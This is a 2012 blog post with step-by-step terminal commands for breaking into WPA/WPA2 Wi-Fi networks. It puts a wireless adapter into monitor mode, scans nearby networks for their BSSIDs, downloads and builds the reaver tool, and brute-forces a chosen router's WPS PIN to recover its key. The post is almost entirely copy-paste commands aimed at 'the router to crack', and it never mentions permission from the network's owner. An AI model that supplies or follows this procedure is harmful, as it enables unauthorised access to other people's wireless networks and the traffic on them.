Wednesday, 22 February 2012

How to crack WPA/WPA2 without a dictionary in 4-10 hours with reaver


The reign of secure WPA/WPA2 network encryption is now over. It no longer takes decades to crack thanks to Tactical Network Solutions. Their brilliant team have found a weakness in WPA that lets an attacker bruteforce against Wifi Protected Setup (WPS) PINS in order to then recover the WPA/WPA2 key. We'll be using a tool which exploits this bug called reaver.

I will take you through how this is done on a Linux machine, specifically Ubuntu!
Using the terminal:

1. Download aircrack-ng:
sudo apt-get install aircrack-ng
2. Put Wifi adapter into monitor mode:
sudo airmon-ng start wlan0
3. Use airodump-ng to scan for WPA/WPA2 encrypted network BSSIDs:
sudo airodump-ng mon0
 4. <crtl+c> after a few seconds or once a list of BSSIDs has populated, it should look like this:


The BSSIDs are listed on the left, these are the IDs for the various surrounding networks. Pick one which is WPA/WPA2 and uses a Public Shared Key (PSK).

Don't close this terminal, open up a new terminal and use this now instead. 

READ STEPS 5-8 OR JUST COPY AND PASTE THIS INTO YOUR TERMINAL AND THEN SKIP TO STEP 9:
sudo apt-get install libsqlite3-dev && wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz && tar xfvz reaver-1.4.tar.gz && cd reaver-1.4/src/ && ./configure && make && sudo make install
5. Download and install libsqlite3-dev:
sudo apt-get install libsqlite3-dev
 6. Download reaver:
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
7. Extract reaver tar.gz file:
tar xfvz reaver-1.4.tar.gz
8. Install reaver:
cd reaver-1.4/src/ && ./configure && make && sudo make install
9. Get cracking! Copy the BSSID you chose from the other open terminal and enter it in like this:
sudo reaver -i mon0 -b <paste BSSID here!!> -vv
-i mon0 = use the mon0 interface which is your wifi adapter in monitor mode.
-b "some BSSID" = the router to crack.
-vv = give very verbose output.

10. Now wait from around 4-10 hours as it cracks the network key!

So I hope people have found this useful. It was just meant as a walk through as opposed to a detailed look at how it all works.